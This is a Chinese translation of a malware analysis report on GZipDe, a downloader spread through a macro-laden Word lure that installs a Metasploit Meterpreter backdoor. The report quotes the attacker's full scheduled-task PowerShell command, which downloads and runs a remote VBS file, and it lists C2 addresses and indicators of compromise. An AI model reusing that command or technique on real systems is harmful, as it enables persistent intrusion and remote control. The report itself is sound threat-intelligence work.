GZipDe: 专为Metasploit定制的加密下载器

在五月末，一个中东新闻网发表了一篇关于下一届上合组织峰会的文章。一周前，安全公司AlienVault实验室检测到了针对该地区的一种新型恶意文件。此文件利用一篇报道中的文字作为诱饵：

这是多级感染的第一步，在多级感染中，会牵涉到若干服务器和工件。尽管最终的目标似乎是安装一个Metasploit后门，我们发现了一个用自定义加密方法扰乱进程内存并规避反病毒检测的.NET下载器。

恶意文件

该文件被一位阿富汗用户上传到了VirusTotal上，其中包含一个嵌入MS Office Word文件的宏病毒。打开此文件，它会执行一个以十六进制数据保存的Visual Basic脚本，并在一个隐藏的Powershell控制台中执行一个新任务。

'C:\Windows\System32\schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR 'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\'http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\\',\\'$env:public\svchost325.vbs\\');(New-Object -com Shell.Application).ShellExecute(\\'$env:public\svchost325.vbs\\');' /F

利用一个 HTTP 请求, 可将其解析成下面的 URL链接:

http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

因为服务器现在离线了，我们错过感染链的下一步命令。

基于我们认为与文件相关的的常用路径，后续感染步骤可能是：

http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe.

GZipDe：加密的下载器

该恶意软件的内部名称是Gzipde，是根据攻击者的机器路径指定的：

\Documents\Visual Studio2008\Projects\gzipde\gzipde\obj\Debug\gzipde.pdb

我们发现，可以在GitHub上公开获取原始的反向tcp链接，尽管攻击者为其添加了额外的加密层。它由一个Base64字符组成，名称为GZipDe，是一个zip压缩文件，而且用对称秘钥做了加密，像是为了躲避反病毒软件的检测。

秘钥是一个多字节数列，其值如下：

解压缩后，可通过解密器。使用RC4加密法则，秘钥长度为23字节。

恶意软件向一个新的内存页面指定了执行，读取和写入特权。然后，它会复制解密负载的内容，并发布和执行一个新的线程。脚本使用WaitForSingleObject C#类，意味着该程序会访问一个互斥对象。由一个特别的处理器控制着系统资源的访问进程。这就会避免相同的恶意软件同时出现多个实例运行，从而减少不必要的资源使用和网络噪音。

负载内容包含了一段联系175.194.42[.]8 站点服务器的shellcode。当服务器不在线的时候，搜索引擎Shodan会将其记录为服务于一个Metasploit负载。

Metasploit正成为定向攻击的青睐。

Metasploit 负载

该服务器（175.194.42[.]8 ）提供了一个Metasploit负载。它包含规避系统检测的shellcode代码（因为它有一个有效的DOS标头）以及一个Meterpreter负载——一个有效的后门。例如，它可以收集系统信息，并让命令与控制服务器接收后续指令。

这段shellcode代码将整个DLL放入内存中，因此即便没有任何信息写入磁盘，它也可以运行。这种运行被称为反射式DLL感染。从这一点看，攻击者可以在本地网络上传输其他任何负载。

附：

文件哈希值

https://otx.alienvault.com/indicator/file/faf003c38758cf70b12bc4899714833e4713096c8f66163e753b3f0e70f2ba28

https://otx.alienvault.com/indicator/file/148d280586de3a62d366c396c8bfedd6683a2e3eb1c3d956da57dbfc19d1983c

https://otx.alienvault.com/indicator/file/3932999be863d5844168e3bbb09ffc2f8d572a8f4a93946adb7e9c438f35c711

IP

118.193.251[.]137

175.194.42[.]8

URL

http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe

http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

本文翻译自AlienVault

声明：本文来自安全内参，版权归作者所有。文章内容仅代表作者独立观点，不代表安全内参立场，转载目的在于传递更多信息。如有侵权，请联系 anquanneican@163.com。